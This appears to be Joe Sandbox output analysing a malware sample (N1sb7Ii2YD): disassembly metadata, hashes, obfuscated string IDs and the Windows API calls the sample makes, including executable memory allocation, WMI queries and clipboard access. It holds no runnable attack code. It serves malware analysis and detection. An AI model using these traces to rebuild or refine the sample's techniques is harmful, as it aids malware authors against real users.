                                                                                                                                                                                                                                                    • Opcode ID: 8bf5be419e97d4aeba59362ee4405b63177e9ea72d340c76fc1dbd34a7535713
                                                                                                                                                                                                                                                    • Instruction ID: 381210f78ea322f673374cf03a2ab6eba84d6d5afac1efb59df7821204f613f6
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8bf5be419e97d4aeba59362ee4405b63177e9ea72d340c76fc1dbd34a7535713
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A0115C3BE5A65087D304DB65D806156B293EAC5214F0DD53DC986D770AEF3DDC028286

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 142 980e0f-980e24 SetErrorMode * 2 143 980e2b-980e2c 142->143 144 980e26 142->144 144->143
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • SetErrorMode.KERNELBASE(00000400,?,?,00980223,?,?), ref: 00980E19
                                                                                                                                                                                                                                                    • SetErrorMode.KERNELBASE(00000000,?,?,00980223,?,?), ref: 00980E1E
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314041305.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_980000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorMode
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2340568224-0
                                                                                                                                                                                                                                                    • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                                    • Instruction ID: 9babd65add41787fb28cde530e85498eb8af6e9ca6adf2efde711e6f51a07407
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 77D0123114512877D7403A94DC09BCE7B1CDF05B62F008411FB0DDA181C770994047E5

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 238 43a950-43a961 239 43a976-43a988 call 43bf00 RtlReAllocateHeap 238->239 240 43a995-43a996 call 438e70 238->240 241 43a98a-43a993 call 438e30 238->241 242 43a968-43a96f 238->242 249 43a9a0-43a9a2 239->249 248 43a99b-43a99e 240->248 241->249 242->239 242->240 248->249
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • RtlReAllocateHeap.NTDLL(?,00000000,?,?,?,00000000,0040B65C,00000000,?), ref: 0043A982
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2312806235.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2312806235.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                                                                                                                    • Opcode ID: 2eba5718b67ec1480271e2bf1c34f5bd19b8968588a838e869f4d5b9ea06510f
                                                                                                                                                                                                                                                    • Instruction ID: 722538be6ec62bdfb2320af1aff19aeee9eb7e72755357ed04131fae2c05cc9a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2eba5718b67ec1480271e2bf1c34f5bd19b8968588a838e869f4d5b9ea06510f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 99E0E576414611FBC6001B24BC06B1B3665AF8A721F02183AF440E6115DA38E811859F

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 250 43ab91-43aba8 GetForegroundWindow call 43c7d0 253 43abad-43abce 250->253
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetForegroundWindow.USER32 ref: 0043AB9F
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2312806235.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2312806235.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ForegroundWindow
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2020703349-0
                                                                                                                                                                                                                                                    • Opcode ID: a0dc0220c6c2ddb49d889c1027b5b2c34b58d9f1c75a0e80b2e5e3c572fe071b
                                                                                                                                                                                                                                                    • Instruction ID: 60e8b0f46bfb036eff5fe615915129b1fb2bd173e47bf556a6606a5c449cc706
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a0dc0220c6c2ddb49d889c1027b5b2c34b58d9f1c75a0e80b2e5e3c572fe071b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 34E08C7EA406008BDB04DF20EC4A5517766B79A305B084039D903C37A6DB3DD816CA49

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 255 438e70-438e7c 256 438e83-438e8e call 43bf00 RtlFreeHeap 255->256 257 438e94-438e95 255->257 256->257
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • RtlFreeHeap.NTDLL(?,00000000,?,004127C7), ref: 00438E8E
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2312806235.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2312806235.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FreeHeap
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3298025750-0
                                                                                                                                                                                                                                                    • Opcode ID: 768fcb1c02373f70ae0863a28d25f36a016012181a68bd02bcb189957d430873
                                                                                                                                                                                                                                                    • Instruction ID: 85901e1c641484a1e9593b863e702362ecf9fc70d5eef9c3d2e46bbe4163b786
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 768fcb1c02373f70ae0863a28d25f36a016012181a68bd02bcb189957d430873
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 63D01235405526EBC6101F24FC06B863A54EF49321F030461B540AF076C734DC908AD8

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 260 438e47-438e4a 261 438e51-438e55 RtlAllocateHeap 260->261
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(?,00000000), ref: 00438E55
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2312806235.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2312806235.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                                                                                                                    • Opcode ID: bde11014aa9fadb2486ac873e4c51e0b14130d9e3c259129d8d0e778167120a1
                                                                                                                                                                                                                                                    • Instruction ID: 4c59684187f8c9fc8ebab3782fe1e1f4842940d007367fb0e8ab7bd4dbd8a192
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bde11014aa9fadb2486ac873e4c51e0b14130d9e3c259129d8d0e778167120a1
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A0C0927C142211FBD2211B21AC5EF6B3E38FB83B63F104124F209580B287649011DA6E
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(?,00000000), ref: 00438E55
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2312806235.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2312806235.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                                                                                                                    • Opcode ID: 1129b59f0d67bf13eed9448a42768f07b4682826011a39e0f4462efca5d079f4
                                                                                                                                                                                                                                                    • Instruction ID: 3dd49d49275fbb255d04589a33f94784ad2ffd24471d3276aa8c957077778349
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1129b59f0d67bf13eed9448a42768f07b4682826011a39e0f4462efca5d079f4
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8AA0223C002200EBC2200B20AC0EF2B3E38FB83B23F000030F00C080B283308000CA2E
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 005604B6
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2313213319.0000000000560000.00000040.00001000.00020000.00000000.sdmp, Offset: 00560000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_560000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4275171209-0
                                                                                                                                                                                                                                                    • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                                    • Instruction ID: d228a9cddfd9111f9a44b2e45a9b5e1d1710010e70b07292a1dc2672d5dd14c0
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 20112B79A40208EFDB01DF98C985E99BFF5AF48351F058094FA489B362D771EA50DF80
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2312806235.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2312806235.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: $!$"$$$%$%$&$($)$*$+$,$-$.$.$.$0$0$1$2$4$4$4$5$6$8$:$;$;$<$=$>$>$?$?$@$B$C$D$D$F$H$J$L$M$N$N$N$O$P$R$T$U$V$X$Z$Z$Z$[$\$\$]$^$^$`$a$b$c$d$e$e$e$e$f$g$h$i$i$j$k$l$l$m$n$o$p$p$r$s$t$t$t$v$v$x$x$z$|$}$~$~$~
                                                                                                                                                                                                                                                    • API String ID: 0-1394229784
                                                                                                                                                                                                                                                    • Opcode ID: 056a6b09ac1f0b8069d8e0856d928db892cc49fb58976f7f6017e888c085083b
                                                                                                                                                                                                                                                    • Instruction ID: 78fde7a8102a4a25e3d516c1edb5f9b2f063fdb03dbd0bbcca9d4d838a68c62c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 056a6b09ac1f0b8069d8e0856d928db892cc49fb58976f7f6017e888c085083b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3F22472190D7E9CDEB26C638CC587DDBEA15B56314F0841D9C19D6B3C2C7BA0B89CB26
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314041305.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_980000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: $!$"$$$%$%$&$($)$*$+$,$-$.$.$.$0$0$1$2$4$4$4$5$6$8$:$;$;$<$=$>$>$?$?$@$B$C$D$D$F$H$J$L$M$N$N$N$O$P$R$T$U$V$X$Z$Z$Z$[$\$\$]$^$^$`$a$b$c$d$e$e$e$e$f$g$h$i$i$j$k$l$l$m$n$o$p$p$r$s$t$t$t$v$v$x$x$z$|$}$~$~$~
                                                                                                                                                                                                                                                    • API String ID: 0-1394229784
                                                                                                                                                                                                                                                    • Opcode ID: 0ad0ccab371ecf03d36c413c93bc7494f07a7df5888065dda6a46f4b89f4694b
                                                                                                                                                                                                                                                    • Instruction ID: b7b68619904db643f23a58fe7a3235c2d63cd50b0f62c4f57f2521e5a816e9c6
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0ad0ccab371ecf03d36c413c93bc7494f07a7df5888065dda6a46f4b89f4694b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6E22582190C7E9CDEB26C638CC487DDBEA15B56314F0841D9C19D6B3C2C7BA0B89DB26
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2312806235.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2312806235.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: *$+$0$:$<$>$@$C$`$`$a$b$d$d$f$g$h$n$n$p$s$w$x$z${${$|$|$}
                                                                                                                                                                                                                                                    • API String ID: 0-334816167
                                                                                                                                                                                                                                                    • Opcode ID: 4d803b101157e4a712cc0ef110f4861eff536f857bbb1a7cf2d313a64b91ceb8
                                                                                                                                                                                                                                                    • Instruction ID: 4ba09c738a8091425718d315f50eff196f5ba60e1b3feeb24fdbf3622366560b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4d803b101157e4a712cc0ef110f4861eff536f857bbb1a7cf2d313a64b91ceb8
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0BF1E521D087E98ADB32C67C8C443CDBFA15B97324F1943D9D4E9AB3D2C6780A46CB56
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314041305.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_980000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: *$+$0$:$<$>$@$C$`$`$a$b$d$d$f$g$h$n$n$p$s$w$x$z${${$|$|$}
                                                                                                                                                                                                                                                    • API String ID: 0-334816167
                                                                                                                                                                                                                                                    • Opcode ID: 63cdccc75301cd355fa4edc8c506f7aea9a9e61635fb673e26f729942e3a0ac3
                                                                                                                                                                                                                                                    • Instruction ID: bf07b7cab8313c5b6a0489ed387d21357ab173c7199bd19ba17961317cb1562d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 63cdccc75301cd355fa4edc8c506f7aea9a9e61635fb673e26f729942e3a0ac3
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2CF1C121D087E98ADB32C67C8C443CDAFA25B53334F1943D9D4E9AB3D2C6790A46DB52
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CoCreateInstance.OLE32(0043F68C,00000000,00000001,0043F67C), ref: 0043640E
                                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(FA46F8B5), ref: 0043646A
                                                                                                                                                                                                                                                    • CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 004364A7
                                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(w!s#), ref: 004364FB
                                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(A3q5), ref: 004365A1
                                                                                                                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 00436613
                                                                                                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00436775
                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 004367A0
                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 004367A6
                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 004367B3
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2312806235.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2312806235.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: String$AllocFree$Variant$BlanketClearCreateInitInstanceProxy
                                                                                                                                                                                                                                                    • String ID: A;$BC$C$T'g)$X&c8$Y/9Q$w!s#$z7}9A3q5
                                                                                                                                                                                                                                                    • API String ID: 2485776651-4124187736
                                                                                                                                                                                                                                                    • Opcode ID: f37239966d689d8424ac6ae2e1628206d27c07f111510ea39260eda61653c23d
                                                                                                                                                                                                                                                    • Instruction ID: 522da010f1620deffab12e26d595bfb80e0736a5a48a815d81ab8756012ad252
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f37239966d689d8424ac6ae2e1628206d27c07f111510ea39260eda61653c23d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7112EC72A083019BD314CF28C881B6BBBE5FFC9304F15992DF595DB290D778D9058B9A
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CoCreateInstance.COMBASE(0043F68C,00000000,00000001,0043F67C), ref: 009B6675
                                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(FA46F8B5), ref: 009B66D1
                                                                                                                                                                                                                                                    • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 009B670E
                                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(w!s#), ref: 009B6762
                                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(A3q5), ref: 009B6808
                                                                                                                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 009B687A
                                                                                                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 009B69DC
                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 009B6A1A
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314041305.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_980000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: String$Alloc$Variant$BlanketClearCreateFreeInitInstanceProxy
                                                                                                                                                                                                                                                    • String ID: A;$BC$C$T'g)$X&c8$Y/9Q$w!s#$z7}9A3q5
                                                                                                                                                                                                                                                    • API String ID: 2775254435-4124187736
                                                                                                                                                                                                                                                    • Opcode ID: 7f006d42d978ea279f5d884ff5246a5058d7d597c52cd245997dba74b9415a56
                                                                                                                                                                                                                                                    • Instruction ID: 8b2194ff7690e0788fff6a04d41575dbc4e034b66a2d6b3437db4a0a57519006
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7f006d42d978ea279f5d884ff5246a5058d7d597c52cd245997dba74b9415a56
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2312CCB26083409BD714CF28C985BABBBE6FBC5314F14892CF595DB290D778E905CB92
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2312806235.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2312806235.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                                                                                                                                                                                                    • String ID: ($P$W$]$j$x
                                                                                                                                                                                                                                                    • API String ID: 2832541153-1642767450
                                                                                                                                                                                                                                                    • Opcode ID: 8b1f1a14f2ecd6cbcc61cef173fb78c483c4298edd8ed21dbcc155f4e5603572
                                                                                                                                                                                                                                                    • Instruction ID: d10a51e23ecba45016217ad21913f42ff9d133ebe453f27826f30668db2baec2
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8b1f1a14f2ecd6cbcc61cef173fb78c483c4298edd8ed21dbcc155f4e5603572
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B941A17050C7818ED301AFB8D88835FBEE0AB8A314F444A7EE4E9963D2D678854DC797
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2312806235.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2312806235.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: 7]7N$9/,8$; >?$<'=0$LSJm$PVNR$R:e}$`{R2$agsy$p~rs$rz|x$sD/f$wkoq$~p~9
                                                                                                                                                                                                                                                    • API String ID: 0-2345621967
                                                                                                                                                                                                                                                    • Opcode ID: a9be2e0f6340cc52a81f7dbe1f742bb92054bc815233c9bebfa9ac53ecd4af8d
                                                                                                                                                                                                                                                    • Instruction ID: bfc0c3310975af71fded0e8a17bd930ed1ccefcf7fefaebca231936fe6ab8075
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a9be2e0f6340cc52a81f7dbe1f742bb92054bc815233c9bebfa9ac53ecd4af8d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 47C1367150C3958BD315CE2584A036BBFE1AFD6304F1889BDE4E11B386D63D8D0ACBA6
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314041305.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_980000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: 7]7N$9/,8$; >?$<'=0$LSJm$PVNR$R:e}$`{R2$agsy$p~rs$rz|x$sD/f$wkoq$~p~9
                                                                                                                                                                                                                                                    • API String ID: 0-2345621967
                                                                                                                                                                                                                                                    • Opcode ID: a9be2e0f6340cc52a81f7dbe1f742bb92054bc815233c9bebfa9ac53ecd4af8d
                                                                                                                                                                                                                                                    • Instruction ID: 2ea6ed62486c9855a5cae80c9f0fd485fb6ce837a100467290383639ce951c55
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a9be2e0f6340cc52a81f7dbe1f742bb92054bc815233c9bebfa9ac53ecd4af8d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F7C1487160C3958FD315CF2584A076BBFE1AFD2344F1C89ACE4E11B782D639890ACB62
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2312806235.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2312806235.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: &$+$4$@$C$O$T$Y$Z$\$g$q$t
                                                                                                                                                                                                                                                    • API String ID: 0-2174627302
                                                                                                                                                                                                                                                    • Opcode ID: fa95428c970c30a1efb578d72b7ddf9eb6b82f5b934b73145c579ff54d310729
                                                                                                                                                                                                                                                    • Instruction ID: 9695cd9248a7320cbd761fb78df0a02734abf8995342c504889e395b39462be9
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fa95428c970c30a1efb578d72b7ddf9eb6b82f5b934b73145c579ff54d310729
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7E728E7160C7818BD3249F38C4953AFBBE2ABD5314F194A3EE5D9873D2D67884858B07
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314041305.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_980000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: &$+$4$@$C$O$T$Y$Z$\$g$q$t
                                                                                                                                                                                                                                                    • API String ID: 0-2174627302
